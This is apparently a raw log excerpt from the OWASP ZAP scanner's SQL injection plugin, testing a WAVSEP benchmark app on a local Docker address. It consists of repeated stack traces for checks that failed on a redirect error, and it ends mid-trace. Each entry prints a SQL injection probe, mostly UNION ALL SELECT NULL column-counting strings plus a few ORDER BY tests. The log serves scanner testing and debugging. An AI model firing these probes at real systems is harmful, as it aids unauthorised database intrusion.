org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679976 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679977 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679978 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679978 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679979 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679980 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679981 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679982 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679983 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679984 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679985 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 8297-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 8297-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679985 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at 